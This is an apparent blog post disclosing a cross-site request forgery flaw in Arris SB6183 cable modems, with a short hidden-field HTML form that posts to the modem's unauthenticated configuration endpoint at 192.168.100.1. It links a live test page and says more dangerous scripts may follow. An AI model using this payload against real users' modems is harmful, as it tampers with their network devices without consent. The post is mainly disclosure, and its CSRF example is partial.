Arris Modem Vulnerability – Updated 3/14
Arris is one of the single largest providers of cable internet modems in the United States and around the world. I was playing around with this a bit tonight while bored and came up with a simple way to cause someone to reboot their modem just by visiting a page.
The controls for configuration changes on Arris modems have no authentication requirement and no human interaction validation… so, it’s possible to force configuration changes simply by loading a page that forces a post method against the modem. I have an example here: https://kalypto.org/ArrisTest/Arristocrap.html
This example is tested against the SB6183 and is able to make a few different changes. Even more is possible via silent changes on some of the Arris models that contain WiFi built into the device.
This is just a simple POST method on docReady that posts back to the form on your modem. The modem just takes five parameters for configuring some basic settings. Because there is no authentication required, you can force the change by having someone navigate to a page that has the post form and docReady call on it. Unless the user has their security setup to prevent cross domain post methods, it should work.
Here is the code in it’s entirety:
<FORM action=”http://192.168.100.1/goform/RgConfiguration.pl” method=”POST”>
<input type=”hidden” name=”GetNonce” size=31 value=>
<input type=”hidden” name=”EEE” size=31 value=”1″ />
<input type=”hidden” name=”TurnOffAllLeds_Cfg” size=31 value=”1″ />
<input type=”hidden” name=”ReceiveLed_Cfg” size=31 value=”1″ />
<input type=”hidden” name=”SendLed_Cfg” size=31 value=”1″ />
UPDATE: Arris has responded on Twitter. Their engineering team will be calling me on Thursday to discuss the issue. I hope to have some good results to share soon (and some more scripts that can be a little more dangerous).